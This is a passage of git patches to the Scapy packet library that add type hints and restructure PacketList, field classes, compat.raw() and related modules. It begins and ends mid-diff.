isinstance(cur_fld, ConditionalField): attrs.append(cur_fld.__class__.__name__[:4]) cur_fld = cur_fld.fld if verbose and isinstance(cur_fld, EnumField) \ and hasattr(cur_fld, "i2s"): - if len(cur_fld.i2s) < 50: + if len(cur_fld.i2s or []) < 50: long_attrs.extend( "%s: %d" % (strval, numval) for numval, strval in @@ -2033,7 +2301,7 @@ def _pkt_ls(obj, verbose=False): elif isinstance(cur_fld, MultiEnumField): fld_depend = cur_fld.depends_on(obj.__class__ if is_pkt else obj) - attrs.append("Depends on %s" % fld_depend.name) + attrs.append("Depends on %s" % fld_depend) if verbose: cur_i2s = cur_fld.i2s_multi.get( cur_fld.depends_on(obj if is_pkt else obj()), {} @@ -2060,21 +2328,25 @@ def _pkt_ls(obj, verbose=False): (f.name, cls, class_name_extras, - f.default, + repr(f.default), long_attrs) ) return fields @conf.commands.register -def ls(obj=None, case_sensitive=False, verbose=False): +def ls(obj=None, # type: Union[str, Packet, Packet_metaclass] + case_sensitive=False, # type: bool + verbose=False # type: bool + ): + # type: (...) -> None """List available layers, or infos on a given layer class or name. :param obj: Packet / packet name to use :param case_sensitive: if obj is a string, is it case sensitive? :param verbose: """ - is_string = isinstance(obj, six.string_types) + is_string = isinstance(obj, str) if obj is None or is_string: tip = False @@ -2115,7 +2387,10 @@ def ls(obj=None, case_sensitive=False, verbose=False): for attr in long_attrs: print("%-15s%s" % ("", attr)) # Restart for payload if any - if is_pkt and not isinstance(obj.payload, NoPayload): + if is_pkt: + obj = cast(Packet, obj) + if isinstance(obj.payload, NoPayload): + return print("--") ls(obj.payload) except ValueError: @@ -2124,6 +2399,7 @@ def ls(obj=None, case_sensitive=False, verbose=False): @conf.commands.register def rfc(cls, ret=False, legend=True): + # type: (Packet_metaclass, bool, bool) -> Optional[str] """ Generate an RFC-like representation of a packet def. @@ -2143,7 +2419,7 @@ def rfc(cls, ret=False, legend=True): lines = [] # Get the size (width) that a field will take # when formatted, from its length in bits - clsize = lambda x: 2 * x - 1 + clsize = lambda x: 2 * x - 1 # type: Callable[[int], int] ident = 0 # Fields UUID # Generate packet groups for f in cls.fields_desc: @@ -2224,6 +2500,7 @@ def rfc(cls, ret=False, legend=True): if ret: return result print(result) + return None ############# @@ -2231,7 +2508,10 @@ def rfc(cls, ret=False, legend=True): ############# @conf.commands.register -def fuzz(p, _inplace=0): +def fuzz(p, # type: Packet + _inplace=0, # type: int + ): + # type: (...) -> Packet """ Transform a layer into a fuzzy layer by replacing some default values by random objects. @@ -2267,7 +2547,8 @@ def fuzz(p, _inplace=0): q.default_fields.update(new_default_fields) # add the random values of the MultipleTypeFields for name in multiple_type_fields: - rnd = q.get_field(name)._find_fld_pkt(q).randval() + fld = cast(MultipleTypeField, q.get_field(name)) + rnd = fld._find_fld_pkt(q).randval() if rnd is not None: new_default_fields[name] = rnd q.default_fields.update(new_default_fields) diff --git a/scapy/plist.py b/scapy/plist.py index 445f4f72864..ef726684490 100644 --- a/scapy/plist.py +++ b/scapy/plist.py @@ -15,8 +15,8 @@ from scapy.compat import lambda_tuple_converter from scapy.config import conf -from scapy.base_classes import BasePacket, BasePacketList, _CanvasDumpExtended -from scapy.fields import IPField, ShortEnumField, PacketField +from scapy.base_classes import BasePacket, BasePacketList, \ + _CanvasDumpExtended, Packet_metaclass, PacketList_metaclass from scapy.utils import do_graph, hexdump, make_table, make_lined_table, \ make_tex_table, issubtype from scapy.extlib import plt, Line2D, \ @@ -24,17 +24,41 @@ from functools import reduce import scapy.modules.six as six from scapy.modules.six.moves import range, zip -from scapy.compat import Optional, List, Union, Tuple, Dict, Any, Callable + +# typings +from scapy.compat import ( + Any, + Callable, + DefaultDict, + Dict, + Generic, + Iterator, + List, + Optional, + Tuple, + TypeVar, + Union, +) from scapy.packet import Packet + + ############# # Results # ############# +_Inner = TypeVar("_Inner", Packet, Tuple[Packet, Packet]) -class PacketList(BasePacketList, _CanvasDumpExtended): + +@six.add_metaclass(PacketList_metaclass) +class _PacketList(Generic[_Inner]): __slots__ = ["stats", "res", "listname"] - def __init__(self, res=None, name="PacketList", stats=None): + def __init__(self, + res=None, # type: Optional[Union[_PacketList[_Inner], List[_Inner]]] # noqa: E501 + name="PacketList", # type: str + stats=None # type: Optional[List[Packet_metaclass]] + ): + # type: (...) -> None """create a packet list from a list of packets res: the list of packets stats: a list of classes that will appear in the stats (defaults to [TCP,UDP,ICMP])""" # noqa: E501 @@ -42,10 +66,11 @@ def __init__(self, res=None, name="PacketList", stats=None): stats = conf.stats_classic_protocols self.stats = stats if res is None: - res = [] - elif isinstance(res, PacketList): - res = res.res - self.res = res + self.res = [] # type: List[_Inner] + elif isinstance(res, _PacketList): + self.res = res.res + else: + self.res = res self.listname = name def __len__(self): @@ -53,15 +78,15 @@ def __len__(self): return len(self.res) def _elt2pkt(self, elt): - # type: (Packet) -> Packet - return elt + # type: (_Inner) -> Packet + return elt # type: ignore def _elt2sum(self, elt): - # type: (Packet) -> str - return elt.summary() + # type: (_Inner) -> str + return elt.summary() # type: ignore def _elt2show(self, elt): - # type: (Packet) -> str + # type: (_Inner) -> str return self._elt2sum(elt) def __repr__(self): @@ -93,7 +118,7 @@ def __repr__(self): ct.punct(">")) def __getstate__(self): - # type: () -> Dict[str, Union[List[PacketField], List[Packet], str]] + # type: () -> Dict[str, Any] """ Creates a basic representation of the instance, used in conjunction with __setstate__() e.g. by pickle @@ -108,7 +133,7 @@ def __getstate__(self): return state def __setstate__(self, state): - # type: (Dict[str, Union[List[PacketField], List[Packet], str]]) -> None # noqa: E501 + # type: (Dict[str, Any]) -> None """ Sets instance attributes to values given by state, used in conjunction with __getstate__() e.g. by pickle @@ -119,11 +144,16 @@ def __setstate__(self, state): self.stats = state['stats'] self.listname = state['listname'] + def __iter__(self): + # type: () -> Iterator[_Inner] + return self.res.__iter__() + def __getattr__(self, attr): # type: (str) -> Any return getattr(self.res, attr) def __getitem__(self, item): + # type: (Any) -> Any if issubtype(item, BasePacket): return self.__class__([x for x in self.res if item in self._elt2pkt(x)], # noqa: E501 name="%s from %s" % (item.__name__, self.listname)) # noqa: E501 @@ -133,12 +163,15 @@ def __getitem__(self, item): return self.res.__getitem__(item) def __add__(self, other): - # type: (PacketList) -> PacketList + # type: (_PacketList[_Inner]) -> _PacketList[_Inner] return self.__class__(self.res + other.res, name="%s+%s" % (self.listname, other.listname)) - def summary(self, prn=None, lfilter=None): - # type: (Optional[Callable], Optional[Callable]) -> None + def summary(self, + prn=None, # type: Optional[Callable[..., Any]] + lfilter=None # type: Optional[Callable[..., bool]] + ): + # type: (...) -> None """prints a summary of each packet :param prn: function to apply to each packet instead of @@ -159,8 +192,11 @@ def summary(self, prn=None, lfilter=None): else: print(prn(*r)) - def nsummary(self, prn=None, lfilter=None): - # type: (Optional[Callable], Optional[Callable]) -> None + def nsummary(self, + prn=None, # type: Optional[Callable[..., Any]] + lfilter=None # type: Optional[Callable[..., bool]] + ): + # type: (...) -> None """prints a summary of each packet with the packet's number :param prn: function to apply to each packet instead of @@ -183,14 +219,16 @@ def nsummary(self, prn=None, lfilter=None): print(prn(*res)) def show(self, *args, **kargs): - # type: (Any, Any) -> None + # type: (*Any, **Any) -> None """Best way to display the packet list. Defaults to nsummary() method""" # noqa: E501 return self.nsummary(*args, **kargs) def filter(self, func): - # type: (Callable) -> PacketList + # type: (Callable[..., bool]) -> _PacketList[_Inner] """Returns a packet list filtered by a truth function. This truth - function has to take a packet as the only argument and return a boolean value.""" # noqa: E501 + function has to take a packet as the only argument and return + a boolean value. + """ # Python 2 backward compatibility func = lambda_tuple_converter(func) @@ -198,23 +236,28 @@ def filter(self, func): name="filtered %s" % self.listname) def make_table(self, *args, **kargs): - # type: (Any, Any) -> None + # type: (Any, Any) -> Optional[str] """Prints a table using a function that returns for each packet its head column value, head row value and displayed value # noqa: E501 ex: p.make_table(lambda x:(x[IP].dst, x[TCP].dport, x[TCP].sprintf("%flags%")) """ # noqa: E501 - return make_table(self.res, *args, **kargs) + return make_table(self.res, *args, **kargs) # type: ignore def make_lined_table(self, *args, **kargs): - # type: (Any, Any) -> None + # type: (Any, Any) -> Optional[str] """Same as make_table, but print a table with lines""" - return make_lined_table(self.res, *args, **kargs) + return make_lined_table(self.res, *args, **kargs) # type: ignore def make_tex_table(self, *args, **kargs): - # type: (Any, Any) -> None + # type: (Any, Any) -> Optional[str] """Same as make_table, but print a table with LaTeX syntax""" - return make_tex_table(self.res, *args, **kargs) - - def plot(self, f, lfilter=None, plot_xy=False, **kargs): - # type: (Callable, Optional[Callable], bool, Any) -> Line2D + return make_tex_table(self.res, *args, **kargs) # type: ignore + + def plot(self, + f, # type: Callable[..., Any] + lfilter=None, # type: Optional[Callable[..., bool]] + plot_xy=False, # type: bool + **kargs # type: Any + ): + # type: (...) -> Line2D """Applies a function to each packet to get a value that will be plotted with matplotlib. A list of matplotlib.lines.Line2D is returned. @@ -245,8 +288,13 @@ def plot(self, f, lfilter=None, plot_xy=False, **kargs): return lines - def diffplot(self, f, delay=1, lfilter=None, **kargs): - # type: (Callable, int, Optional[Callable], Any) -> Line2D + def diffplot(self, + f, # type: Callable[..., Any] + delay=1, # type: int + lfilter=None, # type: Optional[Callable[..., bool]] + **kargs # type: Any + ): + # type: (...) -> Line2D """diffplot(f, delay=1, lfilter=None) Applies a function to couples (l[i],l[i+delay]) @@ -273,8 +321,13 @@ def diffplot(self, f, delay=1, lfilter=None, **kargs): return lines - def multiplot(self, f, lfilter=None, plot_xy=False, **kargs): - # type: (Callable, Optional[Callable], bool, Any) -> Line2D + def multiplot(self, + f, # type: Callable[..., Any] + lfilter=None, # type: Optional[Callable[..., Any]] + plot_xy=False, # type: bool + **kargs # type: Any + ): + # type: (...) -> Line2D """Uses a function that returns a label and a value for this label, then plots all the values label by label. @@ -315,13 +368,13 @@ def multiplot(self, f, lfilter=None, plot_xy=False, **kargs): return lines def rawhexdump(self): - # type: (Optional[Callable]) -> None + # type: () -> None """Prints an hexadecimal dump of each packet in the list""" for p in self: hexdump(self._elt2pkt(p)) def hexraw(self, lfilter=None): - # type: (Optional[Callable]) -> None + # type: (Optional[Callable[..., bool]]) -> None """Same as nsummary(), except that if a packet has a Raw layer, it will be hexdumped # noqa: E501 lfilter: a truth function that decides whether a packet must be displayed""" # noqa: E501 for i, res in enumerate(self.res): @@ -332,10 +385,10 @@ def hexraw(self, lfilter=None): p.sprintf("%.time%"), self._elt2sum(res))) if p.haslayer(conf.raw_layer): - hexdump(p.getlayer(conf.raw_layer).load) + hexdump(p.getlayer(conf.raw_layer).load) # type: ignore def hexdump(self, lfilter=None): - # type: (Optional[Callable]) -> None + # type: (Optional[Callable[..., bool]]) -> None """Same as nsummary(), except that packets are also hexdumped lfilter: a truth function that decides whether a packet must be displayed""" # noqa: E501 for i, res in enumerate(self.res): @@ -348,7 +401,7 @@ def hexdump(self, lfilter=None): hexdump(p) def padding(self, lfilter=None): - # type: (Optional[Callable]) -> None + # type: (Optional[Callable[..., bool]]) -> None """Same as hexraw(), for Padding layer""" for i, res in enumerate(self.res): p = self._elt2pkt(res) @@ -357,24 +410,32 @@ def padding(self, lfilter=None): print("%s %s %s" % (conf.color_theme.id(i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res))) - hexdump(p.getlayer(conf.padding_layer).load) + hexdump( + p.getlayer(conf.padding_layer).load # type: ignore + ) def nzpadding(self, lfilter=None): - # type: (Optional[Callable]) -> None + # type: (Optional[Callable[..., bool]]) -> None """Same as padding() but only non null padding""" for i, res in enumerate(self.res): p = self._elt2pkt(res) if p.haslayer(conf.padding_layer): - pad = p.getlayer(conf.padding_layer).load + pad = p.getlayer(conf.padding_layer).load # type: ignore if pad == pad[0] * len(pad): continue if lfilter is None or lfilter(p): print("%s %s %s" % (conf.color_theme.id(i, fmt="%04i"), p.sprintf("%.time%"), self._elt2sum(res))) - hexdump(p.getlayer(conf.padding_layer).load) - - def conversations(self, getsrcdst=None, **kargs): + hexdump( + p.getlayer(conf.padding_layer).load # type: ignore + ) + + def conversations(self, + getsrcdst=None, # type: Optional[Callable[[Packet], Tuple[Any, ...]]] # noqa: E501 + **kargs # type: Any + ): + # type: (...) -> Any """Graphes a conversations between sources and destinations and display it (using graphviz and imagemagick) @@ -389,7 +450,8 @@ def conversations(self, getsrcdst=None, **kargs): :param prog: which graphviz program to use """ if getsrcdst is None: - def getsrcdst(pkt): + def _getsrcdst(pkt): + # type: (Packet) -> Tuple[str, str] """Extract src and dst addresses""" if 'IP' in pkt: return (pkt['IP'].src, pkt['IP'].dst) @@ -398,7 +460,8 @@ def getsrcdst(pkt): if 'ARP' in pkt: return (pkt['ARP'].psrc, pkt['ARP'].pdst) raise TypeError() - conv = {} + getsrcdst = _getsrcdst + conv = {} # type: Dict[Tuple[Any, ...], Any] for p in self.res: p = self._elt2pkt(p) try: @@ -422,20 +485,25 @@ def getsrcdst(pkt): gr += "}\n" return do_graph(gr, **kargs) - def afterglow(self, src=None, event=None, dst=None, **kargs): - # type: (Optional[Callable], Optional[Callable], Optional[Callable], Any) -> None # noqa: E501 + def afterglow(self, + src=None, # type: Optional[Callable[[_Inner], Any]] + event=None, # type: Optional[Callable[[_Inner], Any]] + dst=None, # type: Optional[Callable[[_Inner], Any]] + **kargs # type: Any + ): + # type: (...) -> Any """Experimental clone attempt of http://sourceforge.net/projects/afterglow each datum is reduced as src -> event -> dst and the data are graphed. by default we have IP.src -> IP.dport -> IP.dst""" if src is None: - src = lambda x: x['IP'].src + src = lambda *x: x[0]['IP'].src if event is None: - event = lambda x: x['IP'].dport + event = lambda *x: x[0]['IP'].dport if dst is None: - dst = lambda x: x['IP'].dst - sl = {} # type: Dict[IPField, Tuple[int, List[ShortEnumField]]] - el = {} # type: Dict[ShortEnumField, Tuple[int, List[IPField]]] - dl = {} # type: Dict[IPField, ShortEnumField] + dst = lambda *x: x[0]['IP'].dst + sl = {} # type: Dict[Any, Tuple[Union[float, int], List[Any]]] + el = {} # type: Dict[Any, Tuple[Union[float, int], List[Any]]] + dl = {} # type: Dict[Any, int] for i in self.res: try: s, e, d = src(i), event(i), dst(i) @@ -460,6 +528,7 @@ def afterglow(self, src=None, event=None, dst=None, **kargs): continue def minmax(x): + # type: (Any) -> Tuple[int, int] m, M = reduce(lambda a, b: (min(a[0], b[0]), max(a[1], b[1])), ((a, a) for a in x)) if m == M: @@ -491,12 +560,12 @@ def minmax(x): gr += "###\n" for s in sl: - n, lst = sl[s] - for e in lst: + n, lst1 = sl[s] + for e in lst1: gr += ' "src.%s" -> "evt.%s";\n' % (repr(s), repr(e)) for e in el: - n, lst = el[e] - for d in lst: + n, lst2 = el[e] + for d in lst2: gr += ' "evt.%s" -> "dst.%s";\n' % (repr(e), repr(d)) gr += "}" @@ -518,37 +587,14 @@ def canvas_dump(self, **kargs): fittosize=1)) return d - def sr(self, multi=0): - # type: (int) -> Tuple[SndRcvList, PacketList] - """sr([multi=1]) -> (SndRcvList, PacketList) - Matches packets in the list and return ( (matched couples), (unmatched packets) )""" # noqa: E501 - remain = self.res[:] - sr = [] - i = 0 - while i < len(remain): - s = remain[i] - j = i - while j < len(remain) - 1: - j += 1 - r = remain[j] - if r.answers(s): - sr.append((s, r)) - if multi: - remain[i]._answered = 1 - remain[j]._answered = 2 - continue - del(remain[j]) - del(remain[i]) - i -= 1 - break - i += 1 - if multi: - remain = [x for x in remain if not hasattr(x, "_answered")] - return SndRcvList(sr), PacketList(remain) - - def sessions(self, session_extractor=None): + def sessions( + self, + session_extractor=None # type: Optional[Callable[[Packet], str]] + ): + # type: (...) -> Dict[str, _PacketList[_Inner]] if session_extractor is None: - def session_extractor(p): + def _session_extractor(p): + # type: (Packet) -> str """Extract sessions from packets""" if 'Ether' in p: if 'IP' in p or 'IPv6' in p: @@ -575,9 +621,12 @@ def session_extractor(p): else: return p.sprintf("Ethernet type=%04xr,Ether.type%") return "Other" - sessions = defaultdict(self.__class__) + session_extractor = _session_extractor + sessions = defaultdict(self.__class__) # type: DefaultDict[str, _PacketList[_Inner]] # noqa: E501 for p in self.res: - sess = session_extractor(self._elt2pkt(p)) + sess = session_extractor( + self._elt2pkt(p) + ) sessions[sess].append(p) return dict(sessions) @@ -596,8 +645,8 @@ def replace(self, *args, **kargs): x = PacketList(name="Replaced %s" % self.listname) if not isinstance(args[0], tuple): args = (args,) - for p in self.res: - p = self._elt2pkt(p) + for _p in self.res: + p = self._elt2pkt(_p) copied = False for scheme in args: fld = scheme[0] @@ -657,8 +706,9 @@ def getlayer(self, cls, # type: Packet # Only return non-None getlayer results return PacketList([ - pc for pc in (p.getlayer(**getlayer_arg) for p in self.res) - if pc is not None], + pc for pc in ( + self._elt2pkt(p).getlayer(**getlayer_arg) for p in self.res + ) if pc is not None], name, stats ) @@ -687,21 +737,55 @@ def convert_to(self, other_cls, name=None, stats=None): stats = self.stats return PacketList( - [p.convert_to(other_cls) for p in self.res], + [self._elt2pkt(p).convert_to(other_cls) for p in self.res], name, stats ) -class SndRcvList(PacketList): +class PacketList(_PacketList[Packet], + BasePacketList, + _CanvasDumpExtended): + def sr(self, multi=0): + # type: (int) -> Tuple[SndRcvList, PacketList] + """sr([multi=1]) -> (SndRcvList, PacketList) + Matches packets in the list and return ( (matched couples), (unmatched packets) )""" # noqa: E501 + remain = self.res[:] + sr = [] + i = 0 + while i < len(remain): + s = remain[i] + j = i + while j < len(remain) - 1: + j += 1 + r = remain[j] + if r.answers(s): + sr.append((s, r)) + if multi: + remain[i]._answered = 1 + remain[j]._answered = 2 + continue + del(remain[j]) + del(remain[i]) + i -= 1 + break + i += 1 + if multi: + remain = [x for x in remain if not hasattr(x, "_answered")] + return SndRcvList(sr), PacketList(remain) + + +class SndRcvList(_PacketList[Tuple[Packet, Packet]], + BasePacketList, + _CanvasDumpExtended): __slots__ = [] # type: List[str] def __init__(self, - res=None, # type: Optional[Union[List[Packet], PacketList]] + res=None, # type: Optional[Union[PacketList, List[Tuple[Packet, Packet]]]] # noqa: E501 name="Results", # type: str stats=None # type: Optional[List[Packet]] ): # type: (...) -> None - PacketList.__init__(self, res, name, stats) + super(SndRcvList, self).__init__(res, name, stats) def _elt2pkt(self, elt): # type: (Tuple[Packet, Packet]) -> Packet diff --git a/scapy/utils.py b/scapy/utils.py index a9bef03fd30..1d8135c5d70 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -37,6 +37,10 @@ from scapy.error import log_runtime, Scapy_Exception, warning from scapy.pton_ntop import inet_pton +from scapy.compat import ( + Any, +) + ########### # Tools # ########### @@ -190,6 +194,7 @@ def restart(): def lhex(x): + # type: (Any) -> str from scapy.volatile import VolatileValue if isinstance(x, VolatileValue): return repr(x) @@ -200,7 +205,7 @@ def lhex(x): elif isinstance(x, list): return "[%s]" % ", ".join(map(lhex, x)) else: - return x + return str(x) @conf.commands.register diff --git a/test/dnssecRR.uts b/test/dnssecRR.uts index 83b76f91d89..769c059138a 100644 --- a/test/dnssecRR.uts +++ b/test/dnssecRR.uts @@ -141,6 +141,6 @@ raw(t) == b"\nSAMPLE-ALG\x07EXAMPLE\x00\x00\xfa\x00\x01\x00\x00\x00\x00\x00\x1b\ = TimeField methods packed_data = b"\x00\x002\xe4\x07\x00" -assert(TimeSignedField("", 0).h2i("", 853804800) == packed_data) -assert(TimeSignedField("", 0).i2h("", packed_data) == 853804800) -assert(TimeSignedField("", 0).i2repr("", packed_data) == "Tue Jan 21 00:00:00 1997") +assert(TimeSignedField("", 0).i2m("", 853804800) == packed_data) +assert(TimeSignedField("", 0).m2i("", packed_data) == 853804800) +assert(TimeSignedField("", 0).i2repr("", 853804800) == "Tue Jan 21 00:00:00 1997") From accef75539dfbd2ebdeb5ee78b160fb2e2254f11 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 7 Jul 2020 09:31:28 +0000 Subject: [PATCH 0288/1632] Type hinting of raw() --- scapy/compat.py | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index 92f4481aa80..2f62b148b7a 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -68,6 +68,7 @@ try: import typing # noqa: F401 + from typing import TYPE_CHECKING if sys.version_info[0:2] <= (3, 6): # Generic is messed up before Python 3.7 # https://github.com/python/typing/issues/449 @@ -75,6 +76,7 @@ FAKE_TYPING = False except ImportError: FAKE_TYPING = True + TYPE_CHECKING = False if not FAKE_TYPING: # Only required if using mypy-lang for static typing @@ -152,6 +154,12 @@ def lambda_tuple_converter(func): return func +# This is ugly, but we don't want to move raw() out of compat.py +# and it makes it much clearer +if TYPE_CHECKING: + from scapy.packet import Packet, RawVal + + if six.PY2: bytes_encode = plain_str = str # type: Callable[[Any], bytes] orb = ord # type: Callable[[bytes], int] @@ -163,17 +171,21 @@ def chb(x): return chr(x) def raw(x): - # type: (Any) -> bytes - """Builds a packet and returns its bytes representation. - This function is and always be cross-version compatible""" + # type: (Union[Packet, RawVal]) -> bytes + """ + Builds a packet and returns its bytes representation. + This function is and will always be cross-version compatible + """ if hasattr(x, "__bytes__"): return x.__bytes__() return bytes(x) else: def raw(x): - # type: (Any) -> bytes - """Builds a packet and returns its bytes representation. - This function is and always be cross-version compatible""" + # type: (Union[Packet, RawVal]) -> bytes + """ + Builds a packet and returns its bytes representation. + This function is and will always be cross-version compatible + """ return bytes(x) def bytes_encode(x): From be01a3d5b4911f1a99132a54e2e28715085f8675 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 4 Sep 2020 23:00:16 +0000 Subject: [PATCH 0289/1632] Patch up after rebase --- scapy/config.py | 11 ++--- scapy/contrib/mqtt.py | 4 +- scapy/fields.py | 41 +++++++++++++----- scapy/layers/dot11.py | 1 - scapy/layers/sixlowpan.py | 2 +- scapy/packet.py | 87 +++++++++++++++++++++------------------ 6 files changed, 87 insertions(+), 59 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 569ffb1ea5f..974394d123d 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -26,7 +26,7 @@ from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS from scapy.error import log_scapy, warning, ScapyInvalidPlatformException from scapy.modules import six -from scapy.themes import ColorTheme, NoTheme, apply_ipython_style +from scapy.themes import NoTheme, apply_ipython_style from scapy.compat import ( Any, @@ -543,7 +543,7 @@ def isPyPy(): def _prompt_changer(attr, val, old): - # type: (str, Any, Any) -> None + # type: (str, Any, Any) -> Any """Change the current prompt theme""" Interceptor.set_from_hook(conf, attr, val) try: @@ -624,7 +624,7 @@ def _set_conf_sockets(): def _socket_changer(attr, val, old): - # type: (str, bool, bool) -> None + # type: (str, bool, bool) -> Any if not isinstance(val, bool): raise TypeError("This argument should be a boolean") Interceptor.set_from_hook(conf, attr, val) @@ -648,13 +648,14 @@ def _socket_changer(attr, val, old): def _loglevel_changer(attr, val, old): - # type: (str, int, int) -> None + # type: (str, int, int) -> int """Handle a change of conf.logLevel""" log_scapy.setLevel(val) return val def _iface_changer(attr, val, old): + # type: (str, Any, Any) -> 'scapy.interfaces.NetworkInterfaceDict' """Resolves the interface in conf.iface""" if isinstance(val, str): from scapy.interfaces import resolve_iface @@ -741,7 +742,7 @@ class Conf(ConfClass): debug_tls = False wepkey = "" #: holds the Scapy interface list and manager - ifaces = None + ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap cache_iflist = {} # type: Dict[str, Tuple[str, List[str], int]] #: holds the Scapy IPv4 routing table and provides methods to diff --git a/scapy/contrib/mqtt.py b/scapy/contrib/mqtt.py index 204fec3e747..a7d7a67024a 100644 --- a/scapy/contrib/mqtt.py +++ b/scapy/contrib/mqtt.py @@ -239,7 +239,7 @@ class MQTTSubscribe(Packet): name = "MQTT subscribe" fields_desc = [ ShortField("msgid", None), - PacketListField("topics", [], cls=MQTTTopicQOS) + PacketListField("topics", [], pkt_cls=MQTTTopicQOS) ] @@ -263,7 +263,7 @@ class MQTTUnsubscribe(Packet): name = "MQTT unsubscribe" fields_desc = [ ShortField("msgid", None), - PacketListField("topics", [], cls=MQTTTopic) + PacketListField("topics", [], pkt_cls=MQTTTopic) ] diff --git a/scapy/fields.py b/scapy/fields.py index eb8afda6446..a33380a819d 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2151,15 +2151,29 @@ class BitField(_BitField[int]): class BitFixedLenField(BitField): __slots__ = ["length_from"] - def __init__(self, name, default, length_from): + def __init__(self, + name, # type: str + default, # type: int + length_from # type: Callable[[BasePacket], int] + ): + # type: (...) -> None self.length_from = length_from super(BitFixedLenField, self).__init__(name, default, 0) - def getfield(self, pkt, s): + def getfield(self, # type: ignore + pkt, # type: BasePacket + s, # type: Union[Tuple[bytes, int], bytes] + ): + # type: (...) -> Union[Tuple[Tuple[bytes, int], int], Tuple[bytes, int]] # noqa: E501 self.size = self.length_from(pkt) return super(BitFixedLenField, self).getfield(pkt, s) - def addfield(self, pkt, s, val): + def addfield(self, # type: ignore + pkt, # type: BasePacket + s, # type: Union[Tuple[bytes, int, int], bytes] + val # type: int + ): + # type: (...) -> Union[Tuple[bytes, int, int], bytes] self.size = self.length_from(pkt) return super(BitFixedLenField, self).addfield(pkt, s, val) @@ -3164,7 +3178,7 @@ def __init__(self, self.unit = unit self.offset = offset self.ndigits = ndigits - Field.__init__(self, name, default, fmt) + Field.__init__(self, name, default, fmt) # type: ignore def i2m(self, pkt, # type: Optional[BasePacket] @@ -3174,21 +3188,21 @@ def i2m(self, if x is None: x = 0 x = (x - self.offset) / self.scaling - if isinstance(x, float) and self.fmt[-1] != "f": + if isinstance(x, float) and self.fmt[-1] != "f": # type: ignore x = int(round(x)) return x def m2i(self, pkt, x): # type: (Optional[BasePacket], Union[int, float]) -> Union[int, float] x = x * self.scaling + self.offset - if isinstance(x, float) and self.fmt[-1] != "f": + if isinstance(x, float) and self.fmt[-1] != "f": # type: ignore x = round(x, self.ndigits) return x def any2i(self, pkt, x): # type: (Optional[BasePacket], Any) -> Union[int, float] if isinstance(x, (str, bytes)): - x = struct.unpack(self.fmt, bytes_encode(x))[0] + x = struct.unpack(self.fmt, bytes_encode(x))[0] # type: ignore x = self.m2i(pkt, x) if not isinstance(x, (int, float)): raise ValueError("Unknown type") @@ -3196,11 +3210,14 @@ def any2i(self, pkt, x): def i2repr(self, pkt, x): # type: (Optional[BasePacket], Union[int, float]) -> str - return "%s %s" % (self.i2h(pkt, x), self.unit) + return "%s %s" % ( + self.i2h(pkt, x), # type: ignore + self.unit + ) def randval(self): # type: () -> RandFloat - value = super(ScalingField, self).randval() + value = Field.randval(self) # type: ignore if value is not None: min_val = round(value.min * self.scaling + self.offset, self.ndigits) @@ -3252,13 +3269,15 @@ class ScalingField(_ScalingField, :param fmt: struct.pack format used to parse and serialize the internal value from and to machine representation # noqa: E501 """ -class BitScalingField(_ScalingField, BitField): + +class BitScalingField(_ScalingField, BitField): # type: ignore """ A ScalingField that is a BitField """ def __init__(self, name, default, size, *args, **kwargs): + # type: (str, int, int, *Any, **Any) -> None _ScalingField.__init__(self, name, default, *args, **kwargs) - BitField.__init__(self, name, default, size) + BitField.__init__(self, name, default, size) # type: ignore class UUIDField(Field[UUID, bytes]): diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index c39bd060163..e6032b84b85 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -63,7 +63,6 @@ X3BytesField, XByteField, XStrFixedLenField, - _BitField, ) from scapy.ansmachine import AnsweringMachine from scapy.plist import PacketList diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index 87caa944690..351139888ef 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -967,7 +967,7 @@ class LoWPAN_NHC(Packet): name = "LOWPAN_NHC" fields_desc = [ PacketListField( - "exts", [], cls=LoWPAN_NHC_Hdr, + "exts", [], pkt_cls=LoWPAN_NHC_Hdr, next_cls_cb=lambda *s: LoWPAN_NHC_Hdr.get_next_cls(s[3]) ) ] diff --git a/scapy/packet.py b/scapy/packet.py index 489b281e1d4..69fec36a371 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -129,41 +129,6 @@ def lower_bonds(self): for lower, fval in six.iteritems(self._overload_fields): print("%-20s %s" % (lower.__name__, ", ".join("%-12s" % ("%s=%r" % i) for i in six.iteritems(fval)))) # noqa: E501 - def __reduce__(self): - # type: () -> Tuple[Packet_metaclass, Tuple[()], Tuple[bytes]] - """Used by pickling methods""" - return (self.__class__, (), ( - self.build(), - self.time, - self.sent_time, - self.direction, - self.sniffed_on, - self.wirelen, - )) - - def __getstate__(self): - # type: () -> Tuple[bytes] - """Mark object as pickable""" - return self.__reduce__()[2] - - def __setstate__(self, state): - # type: (Tuple[bytes]) -> Packet - """Rebuild state using pickable methods""" - self.__init__(state[0]) - self.time = state[1] - self.sent_time = state[2] - self.direction = state[3] - self.sniffed_on = state[4] - self.wirelen = state[5] - return self - - def __deepcopy__(self, - memo, # type: Any - ): - # type: (...) -> Packet - """Used by copy.deepcopy""" - return self.copy() - def __init__(self, _pkt=b"", # type: bytes post_transform=None, # type: Any @@ -190,9 +155,9 @@ def __init__(self, self.explicit = 0 self.raw_packet_cache = None # type: Optional[bytes] self.raw_packet_cache_fields = None # type: Optional[Dict[str, Any]] # noqa: E501 - self.wirelen = None - self.direction = None - self.sniffed_on = None + self.wirelen = None # type: Optional[int] + self.direction = None # type: Optional[int] + self.sniffed_on = None # type: Optional[str] if _pkt: self.dissect(_pkt) if not _internal: @@ -223,6 +188,50 @@ def __init__(self, else: self.post_transforms = [post_transform] + _PickleType = Tuple[ + bytes, + float, + Optional[float], + Optional[int], + 